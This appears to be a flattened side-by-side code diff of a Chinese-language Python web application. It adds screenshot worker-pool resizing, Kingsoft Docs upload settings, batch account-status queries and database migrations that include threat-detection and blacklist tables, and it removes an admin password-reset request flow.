failed_tasks = sum(int(getattr(w, "failed_tasks", 0) or 0) for w in workers)
worker_details = []
for w in workers:
browser_instance = getattr(w, "browser_instance", None)
browser_use_count = 0
browser_created_at = None
if isinstance(browser_instance, dict):
browser_use_count = int(browser_instance.get("use_count", 0) or 0)
browser_created_at = browser_instance.get("created_at")
worker_details.append(
{
"worker_id": getattr(w, "worker_id", None),
"idle": bool(getattr(w, "idle", False)),
"has_browser": bool(browser_instance),
"total_tasks": int(getattr(w, "total_tasks", 0) or 0),
"failed_tasks": int(getattr(w, "failed_tasks", 0) or 0),
"browser_use_count": browser_use_count,
"browser_created_at": browser_created_at,
"last_active_ts": float(getattr(w, "last_activity_ts", 0) or 0),
"thread_alive": bool(getattr(w, "is_alive", lambda: False)()),
}
)
return { return {
'pool_size': self.pool_size, 'pool_size': self.pool_size,
'idle_workers': idle_count, 'idle_workers': idle_count,
'busy_workers': self.pool_size - idle_count, 'busy_workers': max(0, len(workers) - idle_count),
'queue_size': self.task_queue.qsize(), 'queue_size': self.task_queue.qsize(),
'total_tasks': total_tasks, 'total_tasks': total_tasks,
'failed_tasks': failed_tasks, 'failed_tasks': failed_tasks,
'success_rate': f"{(total_tasks - failed_tasks) / total_tasks * 100:.1f}%" if total_tasks > 0 else "N/A" 'success_rate': f"{(total_tasks - failed_tasks) / total_tasks * 100:.1f}%" if total_tasks > 0 else "N/A",
'workers': worker_details,
'timestamp': time.time(),
} }
def wait_for_completion(self, timeout: Optional[float] = None): def wait_for_completion(self, timeout: Optional[float] = None):
@@ -381,7 +375,7 @@ _pool_lock = threading.Lock()
def get_browser_worker_pool(pool_size: int = 3, log_callback: Optional[Callable] = None) -> BrowserWorkerPool: def get_browser_worker_pool(pool_size: int = 3, log_callback: Optional[Callable] = None) -> BrowserWorkerPool:
"""获取全局浏览器工作线程池(单例)""" """获取全局截图工作线程池(单例)"""
global _global_pool global _global_pool
with _pool_lock: with _pool_lock:
@@ -393,12 +387,46 @@ def get_browser_worker_pool(pool_size: int = 3, log_callback: Optional[Callable]
def init_browser_worker_pool(pool_size: int = 3, log_callback: Optional[Callable] = None): def init_browser_worker_pool(pool_size: int = 3, log_callback: Optional[Callable] = None):
"""初始化全局浏览器工作线程池""" """初始化全局截图工作线程池"""
get_browser_worker_pool(pool_size=pool_size, log_callback=log_callback) get_browser_worker_pool(pool_size=pool_size, log_callback=log_callback)
def _shutdown_pool_when_idle(pool: BrowserWorkerPool) -> None:
try:
pool.wait_for_completion(timeout=60)
except Exception:
pass
try:
pool.shutdown()
except Exception:
pass
def resize_browser_worker_pool(pool_size: int, log_callback: Optional[Callable] = None) -> bool:
"""调整截图线程池并发(新任务走新池,旧池空闲后自动关闭)"""
global _global_pool
try:
target_size = max(1, int(pool_size))
except Exception:
target_size = 1
with _pool_lock:
old_pool = _global_pool
if old_pool and int(getattr(old_pool, "pool_size", 0) or 0) == target_size:
return False
effective_log_callback = log_callback or (getattr(old_pool, "log_callback", None) if old_pool else None)
_global_pool = BrowserWorkerPool(pool_size=target_size, log_callback=effective_log_callback)
_global_pool.initialize()
if old_pool:
threading.Thread(target=_shutdown_pool_when_idle, args=(old_pool,), daemon=True).start()
return True
def shutdown_browser_worker_pool(): def shutdown_browser_worker_pool():
"""关闭全局浏览器工作线程池""" """关闭全局截图工作线程池"""
global _global_pool global _global_pool
with _pool_lock: with _pool_lock:
@@ -409,7 +437,7 @@ def shutdown_browser_worker_pool():
if __name__ == '__main__': if __name__ == '__main__':
# 测试代码 # 测试代码
print("测试浏览器工作线程池...") print("测试截图工作线程池...")
def test_task(browser_instance, url: str, task_id: int): def test_task(browser_instance, url: str, task_id: int):
"""测试任务访问URL""" """测试任务访问URL"""

View File

@@ -24,15 +24,11 @@ from db.schema import ensure_schema
from db.migrations import migrate_database as _migrate_database from db.migrations import migrate_database as _migrate_database
from db.admin import ( from db.admin import (
admin_reset_user_password, admin_reset_user_password,
approve_password_reset,
clean_old_operation_logs, clean_old_operation_logs,
create_password_reset_request,
ensure_default_admin, ensure_default_admin,
get_hourly_registration_count, get_hourly_registration_count,
get_pending_password_resets,
get_system_config_raw as _get_system_config_raw, get_system_config_raw as _get_system_config_raw,
get_system_stats, get_system_stats,
reject_password_reset,
update_admin_password, update_admin_password,
update_admin_username, update_admin_username,
update_system_config as _update_system_config, update_system_config as _update_system_config,
@@ -44,6 +40,7 @@ from db.accounts import (
delete_user_accounts, delete_user_accounts,
get_account, get_account,
get_account_status, get_account_status,
get_account_status_batch,
get_user_accounts, get_user_accounts,
increment_account_login_fail, increment_account_login_fail,
reset_account_login_status, reset_account_login_status,
@@ -103,6 +100,7 @@ from db.users import (
get_pending_users, get_pending_users,
get_user_by_id, get_user_by_id,
get_user_by_username, get_user_by_username,
get_user_kdocs_settings,
get_user_stats, get_user_stats,
get_user_vip_info, get_user_vip_info,
get_vip_config, get_vip_config,
@@ -111,6 +109,7 @@ from db.users import (
remove_user_vip, remove_user_vip,
set_default_vip_days, set_default_vip_days,
set_user_vip, set_user_vip,
update_user_kdocs_settings,
verify_user, verify_user,
) )
from db.security import record_login_context from db.security import record_login_context
@@ -121,7 +120,7 @@ config = get_config()
DB_FILE = config.DB_FILE DB_FILE = config.DB_FILE
# 数据库版本 (用于迁移管理) # 数据库版本 (用于迁移管理)
DB_VERSION = 12 DB_VERSION = 17
# ==================== 系统配置缓存P1 / O-03 ==================== # ==================== 系统配置缓存P1 / O-03 ====================
@@ -190,12 +189,24 @@ def update_system_config(
schedule_weekdays=None, schedule_weekdays=None,
max_concurrent_per_account=None, max_concurrent_per_account=None,
max_screenshot_concurrent=None, max_screenshot_concurrent=None,
enable_screenshot=None,
proxy_enabled=None, proxy_enabled=None,
proxy_api_url=None, proxy_api_url=None,
proxy_expire_minutes=None, proxy_expire_minutes=None,
auto_approve_enabled=None, auto_approve_enabled=None,
auto_approve_hourly_limit=None, auto_approve_hourly_limit=None,
auto_approve_vip_days=None, auto_approve_vip_days=None,
kdocs_enabled=None,
kdocs_doc_url=None,
kdocs_default_unit=None,
kdocs_sheet_name=None,
kdocs_sheet_index=None,
kdocs_unit_column=None,
kdocs_image_column=None,
kdocs_admin_notify_enabled=None,
kdocs_admin_notify_email=None,
kdocs_row_start=None,
kdocs_row_end=None,
): ):
"""更新系统配置(写入后立即失效缓存)。""" """更新系统配置(写入后立即失效缓存)。"""
ok = _update_system_config( ok = _update_system_config(
@@ -206,12 +217,24 @@ def update_system_config(
schedule_weekdays=schedule_weekdays, schedule_weekdays=schedule_weekdays,
max_concurrent_per_account=max_concurrent_per_account, max_concurrent_per_account=max_concurrent_per_account,
max_screenshot_concurrent=max_screenshot_concurrent, max_screenshot_concurrent=max_screenshot_concurrent,
enable_screenshot=enable_screenshot,
proxy_enabled=proxy_enabled, proxy_enabled=proxy_enabled,
proxy_api_url=proxy_api_url, proxy_api_url=proxy_api_url,
proxy_expire_minutes=proxy_expire_minutes, proxy_expire_minutes=proxy_expire_minutes,
auto_approve_enabled=auto_approve_enabled, auto_approve_enabled=auto_approve_enabled,
auto_approve_hourly_limit=auto_approve_hourly_limit, auto_approve_hourly_limit=auto_approve_hourly_limit,
auto_approve_vip_days=auto_approve_vip_days, auto_approve_vip_days=auto_approve_vip_days,
kdocs_enabled=kdocs_enabled,
kdocs_doc_url=kdocs_doc_url,
kdocs_default_unit=kdocs_default_unit,
kdocs_sheet_name=kdocs_sheet_name,
kdocs_sheet_index=kdocs_sheet_index,
kdocs_unit_column=kdocs_unit_column,
kdocs_image_column=kdocs_image_column,
kdocs_admin_notify_enabled=kdocs_admin_notify_enabled,
kdocs_admin_notify_email=kdocs_admin_notify_email,
kdocs_row_start=kdocs_row_start,
kdocs_row_end=kdocs_row_end,
) )
if ok: if ok:
invalidate_system_config_cache() invalidate_system_config_cache()

View File

@@ -140,6 +140,36 @@ def get_account_status(account_id):
return cursor.fetchone() return cursor.fetchone()
def get_account_status_batch(account_ids):
"""批量获取账号状态信息"""
account_ids = [str(account_id) for account_id in (account_ids or []) if account_id]
if not account_ids:
return {}
results = {}
chunk_size = 900 # 避免触发 SQLite 绑定参数上限
with db_pool.get_db() as conn:
cursor = conn.cursor()
for idx in range(0, len(account_ids), chunk_size):
chunk = account_ids[idx : idx + chunk_size]
placeholders = ",".join("?" for _ in chunk)
cursor.execute(
f"""
SELECT id, status, login_fail_count, last_login_error
FROM accounts
WHERE id IN ({placeholders})
""",
chunk,
)
for row in cursor.fetchall():
row_dict = dict(row)
account_id = str(row_dict.pop("id", ""))
if account_id:
results[account_id] = row_dict
return results
def delete_user_accounts(user_id): def delete_user_accounts(user_id):
"""删除用户的所有账号""" """删除用户的所有账号"""
with db_pool.get_db() as conn: with db_pool.get_db() as conn:
@@ -147,4 +177,3 @@ def delete_user_accounts(user_id):
cursor.execute("DELETE FROM accounts WHERE user_id = ?", (user_id,)) cursor.execute("DELETE FROM accounts WHERE user_id = ?", (user_id,))
conn.commit() conn.commit()
return cursor.rowcount return cursor.rowcount

View File

@@ -172,6 +172,17 @@ def get_system_config_raw() -> dict:
"auto_approve_enabled": 0, "auto_approve_enabled": 0,
"auto_approve_hourly_limit": 10, "auto_approve_hourly_limit": 10,
"auto_approve_vip_days": 7, "auto_approve_vip_days": 7,
"kdocs_enabled": 0,
"kdocs_doc_url": "",
"kdocs_default_unit": "",
"kdocs_sheet_name": "",
"kdocs_sheet_index": 0,
"kdocs_unit_column": "A",
"kdocs_image_column": "D",
"kdocs_admin_notify_enabled": 0,
"kdocs_admin_notify_email": "",
"kdocs_row_start": 0,
"kdocs_row_end": 0,
} }
@@ -184,12 +195,24 @@ def update_system_config(
schedule_weekdays=None, schedule_weekdays=None,
max_concurrent_per_account=None, max_concurrent_per_account=None,
max_screenshot_concurrent=None, max_screenshot_concurrent=None,
enable_screenshot=None,
proxy_enabled=None, proxy_enabled=None,
proxy_api_url=None, proxy_api_url=None,
proxy_expire_minutes=None, proxy_expire_minutes=None,
auto_approve_enabled=None, auto_approve_enabled=None,
auto_approve_hourly_limit=None, auto_approve_hourly_limit=None,
auto_approve_vip_days=None, auto_approve_vip_days=None,
kdocs_enabled=None,
kdocs_doc_url=None,
kdocs_default_unit=None,
kdocs_sheet_name=None,
kdocs_sheet_index=None,
kdocs_unit_column=None,
kdocs_image_column=None,
kdocs_admin_notify_enabled=None,
kdocs_admin_notify_email=None,
kdocs_row_start=None,
kdocs_row_end=None,
) -> bool: ) -> bool:
"""更新系统配置仅更新DB不做缓存处理""" """更新系统配置仅更新DB不做缓存处理"""
allowed_fields = { allowed_fields = {
@@ -200,12 +223,24 @@ def update_system_config(
"schedule_weekdays", "schedule_weekdays",
"max_concurrent_per_account", "max_concurrent_per_account",
"max_screenshot_concurrent", "max_screenshot_concurrent",
"enable_screenshot",
"proxy_enabled", "proxy_enabled",
"proxy_api_url", "proxy_api_url",
"proxy_expire_minutes", "proxy_expire_minutes",
"auto_approve_enabled", "auto_approve_enabled",
"auto_approve_hourly_limit", "auto_approve_hourly_limit",
"auto_approve_vip_days", "auto_approve_vip_days",
"kdocs_enabled",
"kdocs_doc_url",
"kdocs_default_unit",
"kdocs_sheet_name",
"kdocs_sheet_index",
"kdocs_unit_column",
"kdocs_image_column",
"kdocs_admin_notify_enabled",
"kdocs_admin_notify_email",
"kdocs_row_start",
"kdocs_row_end",
"updated_at", "updated_at",
} }
@@ -232,6 +267,9 @@ def update_system_config(
if max_screenshot_concurrent is not None: if max_screenshot_concurrent is not None:
updates.append("max_screenshot_concurrent = ?") updates.append("max_screenshot_concurrent = ?")
params.append(max_screenshot_concurrent) params.append(max_screenshot_concurrent)
if enable_screenshot is not None:
updates.append("enable_screenshot = ?")
params.append(enable_screenshot)
if schedule_weekdays is not None: if schedule_weekdays is not None:
updates.append("schedule_weekdays = ?") updates.append("schedule_weekdays = ?")
params.append(schedule_weekdays) params.append(schedule_weekdays)
@@ -253,6 +291,39 @@ def update_system_config(
if auto_approve_vip_days is not None: if auto_approve_vip_days is not None:
updates.append("auto_approve_vip_days = ?") updates.append("auto_approve_vip_days = ?")
params.append(auto_approve_vip_days) params.append(auto_approve_vip_days)
if kdocs_enabled is not None:
updates.append("kdocs_enabled = ?")
params.append(kdocs_enabled)
if kdocs_doc_url is not None:
updates.append("kdocs_doc_url = ?")
params.append(kdocs_doc_url)
if kdocs_default_unit is not None:
updates.append("kdocs_default_unit = ?")
params.append(kdocs_default_unit)
if kdocs_sheet_name is not None:
updates.append("kdocs_sheet_name = ?")
params.append(kdocs_sheet_name)
if kdocs_sheet_index is not None:
updates.append("kdocs_sheet_index = ?")
params.append(kdocs_sheet_index)
if kdocs_unit_column is not None:
updates.append("kdocs_unit_column = ?")
params.append(kdocs_unit_column)
if kdocs_image_column is not None:
updates.append("kdocs_image_column = ?")
params.append(kdocs_image_column)
if kdocs_admin_notify_enabled is not None:
updates.append("kdocs_admin_notify_enabled = ?")
params.append(kdocs_admin_notify_enabled)
if kdocs_admin_notify_email is not None:
updates.append("kdocs_admin_notify_email = ?")
params.append(kdocs_admin_notify_email)
if kdocs_row_start is not None:
updates.append("kdocs_row_start = ?")
params.append(kdocs_row_start)
if kdocs_row_end is not None:
updates.append("kdocs_row_end = ?")
params.append(kdocs_row_end)
if not updates: if not updates:
return False return False
@@ -287,108 +358,6 @@ def get_hourly_registration_count() -> int:
# ==================== 密码重置(管理员) ==================== # ==================== 密码重置(管理员) ====================
def create_password_reset_request(user_id: int, new_password: str):
"""创建密码重置申请(存储哈希)"""
with db_pool.get_db() as conn:
cursor = conn.cursor()
password_hash = hash_password_bcrypt(new_password)
cst_time = get_cst_now_str()
try:
cursor.execute(
"""
INSERT INTO password_reset_requests (user_id, new_password_hash, status, created_at)
VALUES (?, ?, 'pending', ?)
""",
(user_id, password_hash, cst_time),
)
conn.commit()
return cursor.lastrowid
except Exception as e:
print(f"创建密码重置申请失败: {e}")
return None
def get_pending_password_resets():
"""获取待审核的密码重置申请列表"""
with db_pool.get_db() as conn:
cursor = conn.cursor()
cursor.execute(
"""
SELECT r.id, r.user_id, r.created_at, r.status,
u.username, u.email
FROM password_reset_requests r
JOIN users u ON r.user_id = u.id
WHERE r.status = 'pending'
ORDER BY r.created_at DESC
"""
)
return [dict(row) for row in cursor.fetchall()]
def approve_password_reset(request_id: int) -> bool:
"""批准密码重置申请"""
with db_pool.get_db() as conn:
cursor = conn.cursor()
cst_time = get_cst_now_str()
try:
cursor.execute(
"""
SELECT user_id, new_password_hash
FROM password_reset_requests
WHERE id = ? AND status = 'pending'
""",
(request_id,),
)
result = cursor.fetchone()
if not result:
return False
user_id = result["user_id"]
new_password_hash = result["new_password_hash"]
cursor.execute("UPDATE users SET password_hash = ? WHERE id = ?", (new_password_hash, user_id))
cursor.execute(
"""
UPDATE password_reset_requests
SET status = 'approved', processed_at = ?
WHERE id = ?
""",
(cst_time, request_id),
)
conn.commit()
return True
except Exception as e:
print(f"批准密码重置失败: {e}")
return False
def reject_password_reset(request_id: int) -> bool:
"""拒绝密码重置申请"""
with db_pool.get_db() as conn:
cursor = conn.cursor()
cst_time = get_cst_now_str()
try:
cursor.execute(
"""
UPDATE password_reset_requests
SET status = 'rejected', processed_at = ?
WHERE id = ? AND status = 'pending'
""",
(cst_time, request_id),
)
conn.commit()
return cursor.rowcount > 0
except Exception as e:
print(f"拒绝密码重置失败: {e}")
return False
def admin_reset_user_password(user_id: int, new_password: str) -> bool: def admin_reset_user_password(user_id: int, new_password: str) -> bool:
"""管理员直接重置用户密码""" """管理员直接重置用户密码"""
with db_pool.get_db() as conn: with db_pool.get_db() as conn:

View File

@@ -6,10 +6,12 @@ import db_pool
from db.utils import get_cst_now_str from db.utils import get_cst_now_str
def create_announcement(title, content, is_active=True): def create_announcement(title, content, image_url=None, is_active=True):
"""创建公告(默认启用;启用时会自动停用其他公告)""" """创建公告(默认启用;启用时会自动停用其他公告)"""
title = (title or "").strip() title = (title or "").strip()
content = (content or "").strip() content = (content or "").strip()
image_url = (image_url or "").strip()
image_url = image_url or None
if not title or not content: if not title or not content:
return None return None
@@ -22,10 +24,10 @@ def create_announcement(title, content, is_active=True):
cursor.execute( cursor.execute(
""" """
INSERT INTO announcements (title, content, is_active, created_at, updated_at) INSERT INTO announcements (title, content, image_url, is_active, created_at, updated_at)
VALUES (?, ?, ?, ?, ?) VALUES (?, ?, ?, ?, ?, ?)
""", """,
(title, content, 1 if is_active else 0, cst_time, cst_time), (title, content, image_url, 1 if is_active else 0, cst_time, cst_time),
) )
conn.commit() conn.commit()
return cursor.lastrowid return cursor.lastrowid
@@ -129,4 +131,3 @@ def dismiss_announcement_for_user(user_id, announcement_id):
) )
conn.commit() conn.commit()
return cursor.rowcount >= 0 return cursor.rowcount >= 0

View File

@@ -72,6 +72,24 @@ def migrate_database(conn, target_version: int) -> None:
if current_version < 12: if current_version < 12:
_migrate_to_v12(conn) _migrate_to_v12(conn)
current_version = 12 current_version = 12
if current_version < 13:
_migrate_to_v13(conn)
current_version = 13
if current_version < 14:
_migrate_to_v14(conn)
current_version = 14
if current_version < 15:
_migrate_to_v15(conn)
current_version = 15
if current_version < 16:
_migrate_to_v16(conn)
current_version = 16
if current_version < 17:
_migrate_to_v17(conn)
current_version = 17
if current_version < 18:
_migrate_to_v18(conn)
current_version = 18
if current_version != int(target_version): if current_version != int(target_version):
set_current_version(conn, int(target_version)) set_current_version(conn, int(target_version))
@@ -519,3 +537,215 @@ def _migrate_to_v12(conn):
cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)") cursor.execute("CREATE INDEX IF NOT EXISTS idx_login_ips_user ON login_ips(user_id)")
conn.commit() conn.commit()
def _migrate_to_v13(conn):
"""迁移到版本13 - 安全防护:威胁检测相关表"""
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
threat_type TEXT NOT NULL,
score INTEGER NOT NULL DEFAULT 0,
rule TEXT,
field_name TEXT,
matched TEXT,
value_preview TEXT,
ip TEXT,
user_id INTEGER,
request_method TEXT,
request_path TEXT,
user_agent TEXT,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_created_at ON threat_events(created_at)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_ip ON threat_events(ip)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_user_id ON threat_events(user_id)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_events_type ON threat_events(threat_type)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_risk_scores (
ip TEXT PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_score ON ip_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_risk_scores_updated_at ON ip_risk_scores(updated_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_risk_scores (
user_id INTEGER PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_score ON user_risk_scores(risk_score)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_risk_scores_updated_at ON user_risk_scores(updated_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_blacklist (
ip TEXT PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_active ON ip_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_ip_blacklist_expires ON ip_blacklist(expires_at)")
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_signatures (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT UNIQUE NOT NULL,
threat_type TEXT NOT NULL,
pattern TEXT NOT NULL,
pattern_type TEXT DEFAULT 'regex',
score INTEGER DEFAULT 0,
is_active INTEGER DEFAULT 1,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_type ON threat_signatures(threat_type)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_threat_signatures_active ON threat_signatures(is_active)")
conn.commit()
def _migrate_to_v14(conn):
"""迁移到版本14 - 安全防护:用户黑名单表"""
cursor = conn.cursor()
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_active ON user_blacklist(is_active)")
cursor.execute("CREATE INDEX IF NOT EXISTS idx_user_blacklist_expires ON user_blacklist(expires_at)")
conn.commit()
def _migrate_to_v15(conn):
"""迁移到版本15 - 邮件设置:新设备登录提醒全局开关"""
cursor = conn.cursor()
cursor.execute("SELECT name FROM sqlite_master WHERE type='table' AND name='email_settings'")
if not cursor.fetchone():
# 邮件表由 email_service.init_email_tables 创建;此处仅做增量字段迁移
return
cursor.execute("PRAGMA table_info(email_settings)")
columns = [col[1] for col in cursor.fetchall()]
changed = False
if "login_alert_enabled" not in columns:
cursor.execute("ALTER TABLE email_settings ADD COLUMN login_alert_enabled INTEGER DEFAULT 1")
print(" ✓ 添加 email_settings.login_alert_enabled 字段")
changed = True
try:
cursor.execute("UPDATE email_settings SET login_alert_enabled = 1 WHERE login_alert_enabled IS NULL")
if cursor.rowcount:
changed = True
except sqlite3.OperationalError:
# 列不存在等情况由上方迁移兜底;不阻断主流程
pass
if changed:
conn.commit()
def _migrate_to_v16(conn):
"""迁移到版本16 - 公告支持图片字段"""
cursor = conn.cursor()
cursor.execute("PRAGMA table_info(announcements)")
columns = [col[1] for col in cursor.fetchall()]
if "image_url" not in columns:
cursor.execute("ALTER TABLE announcements ADD COLUMN image_url TEXT")
conn.commit()
print(" ✓ 添加 announcements.image_url 字段")
def _migrate_to_v17(conn):
"""迁移到版本17 - 金山文档上传配置与用户开关"""
cursor = conn.cursor()
cursor.execute("PRAGMA table_info(system_config)")
columns = [col[1] for col in cursor.fetchall()]
system_fields = [
("kdocs_enabled", "INTEGER DEFAULT 0"),
("kdocs_doc_url", "TEXT DEFAULT ''"),
("kdocs_default_unit", "TEXT DEFAULT ''"),
("kdocs_sheet_name", "TEXT DEFAULT ''"),
("kdocs_sheet_index", "INTEGER DEFAULT 0"),
("kdocs_unit_column", "TEXT DEFAULT 'A'"),
("kdocs_image_column", "TEXT DEFAULT 'D'"),
("kdocs_admin_notify_enabled", "INTEGER DEFAULT 0"),
("kdocs_admin_notify_email", "TEXT DEFAULT ''"),
]
for field, ddl in system_fields:
if field not in columns:
cursor.execute(f"ALTER TABLE system_config ADD COLUMN {field} {ddl}")
print(f" ✓ 添加 system_config.{field} 字段")
cursor.execute("PRAGMA table_info(users)")
columns = [col[1] for col in cursor.fetchall()]
user_fields = [
("kdocs_unit", "TEXT DEFAULT ''"),
("kdocs_auto_upload", "INTEGER DEFAULT 0"),
]
for field, ddl in user_fields:
if field not in columns:
cursor.execute(f"ALTER TABLE users ADD COLUMN {field} {ddl}")
print(f" ✓ 添加 users.{field} 字段")
conn.commit()
def _migrate_to_v18(conn):
"""迁移到版本18 - 金山文档上传:有效行范围配置"""
cursor = conn.cursor()
cursor.execute("PRAGMA table_info(system_config)")
columns = [col[1] for col in cursor.fetchall()]
if "kdocs_row_start" not in columns:
cursor.execute("ALTER TABLE system_config ADD COLUMN kdocs_row_start INTEGER DEFAULT 0")
print(" ✓ 添加 system_config.kdocs_row_start 字段")
if "kdocs_row_end" not in columns:
cursor.execute("ALTER TABLE system_config ADD COLUMN kdocs_row_end INTEGER DEFAULT 0")
print(" ✓ 添加 system_config.kdocs_row_end 字段")
conn.commit()

View File

@@ -33,6 +33,8 @@ def ensure_schema(conn) -> None:
email TEXT, email TEXT,
email_verified INTEGER DEFAULT 0, email_verified INTEGER DEFAULT 0,
email_notify_enabled INTEGER DEFAULT 1, email_notify_enabled INTEGER DEFAULT 1,
kdocs_unit TEXT DEFAULT '',
kdocs_auto_upload INTEGER DEFAULT 0,
status TEXT DEFAULT 'approved', status TEXT DEFAULT 'approved',
vip_expire_time TIMESTAMP, vip_expire_time TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP, created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
@@ -72,6 +74,101 @@ def ensure_schema(conn) -> None:
""" """
) )
# ==================== 安全防护:威胁检测相关表 ====================
# 威胁事件日志表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
threat_type TEXT NOT NULL,
score INTEGER NOT NULL DEFAULT 0,
rule TEXT,
field_name TEXT,
matched TEXT,
value_preview TEXT,
ip TEXT,
user_id INTEGER,
request_method TEXT,
request_path TEXT,
user_agent TEXT,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# IP风险评分表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_risk_scores (
ip TEXT PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
# 用户风险评分表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_risk_scores (
user_id INTEGER PRIMARY KEY,
risk_score INTEGER NOT NULL DEFAULT 0,
last_seen TIMESTAMP,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# IP黑名单表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS ip_blacklist (
ip TEXT PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP
)
"""
)
# 用户黑名单表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS user_blacklist (
user_id INTEGER PRIMARY KEY,
reason TEXT,
is_active INTEGER DEFAULT 1,
added_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
expires_at TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# 威胁特征库表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS threat_signatures (
id INTEGER PRIMARY KEY AUTOINCREMENT,
name TEXT UNIQUE NOT NULL,
threat_type TEXT NOT NULL,
pattern TEXT NOT NULL,
pattern_type TEXT DEFAULT 'regex',
score INTEGER DEFAULT 0,
is_active INTEGER DEFAULT 1,
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
)
"""
)
# 账号表(关联用户) # 账号表(关联用户)
cursor.execute( cursor.execute(
""" """
@@ -118,6 +215,17 @@ def ensure_schema(conn) -> None:
auto_approve_enabled INTEGER DEFAULT 0, auto_approve_enabled INTEGER DEFAULT 0,
auto_approve_hourly_limit INTEGER DEFAULT 10, auto_approve_hourly_limit INTEGER DEFAULT 10,
auto_approve_vip_days INTEGER DEFAULT 7, auto_approve_vip_days INTEGER DEFAULT 7,
kdocs_enabled INTEGER DEFAULT 0,
kdocs_doc_url TEXT DEFAULT '',
kdocs_default_unit TEXT DEFAULT '',
kdocs_sheet_name TEXT DEFAULT '',
kdocs_sheet_index INTEGER DEFAULT 0,
kdocs_unit_column TEXT DEFAULT 'A',
kdocs_image_column TEXT DEFAULT 'D',
kdocs_admin_notify_enabled INTEGER DEFAULT 0,
kdocs_admin_notify_email TEXT DEFAULT '',
kdocs_row_start INTEGER DEFAULT 0,
kdocs_row_end INTEGER DEFAULT 0,
updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP updated_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP
) )
""" """
@@ -144,21 +252,6 @@ def ensure_schema(conn) -> None:
""" """
) )
# 密码重置申请表
cursor.execute(
"""
CREATE TABLE IF NOT EXISTS password_reset_requests (
id INTEGER PRIMARY KEY AUTOINCREMENT,
user_id INTEGER NOT NULL,
new_password_hash TEXT NOT NULL,
status TEXT NOT NULL DEFAULT 'pending',
created_at TIMESTAMP DEFAULT CURRENT_TIMESTAMP,
processed_at TIMESTAMP,
FOREIGN KEY (user_id) REFERENCES users (id) ON DELETE CASCADE
)
"""
)
# 数据库版本表 # 数据库版本表
cursor.execute( cursor.execute(
""" """
@@ -196,6 +289,7 @@ def ensure_schema(conn) -> None:
id INTEGER PRIMARY KEY AUTOINCREMENT, id INTEGER PRIMARY KEY AUTOINCREMENT,
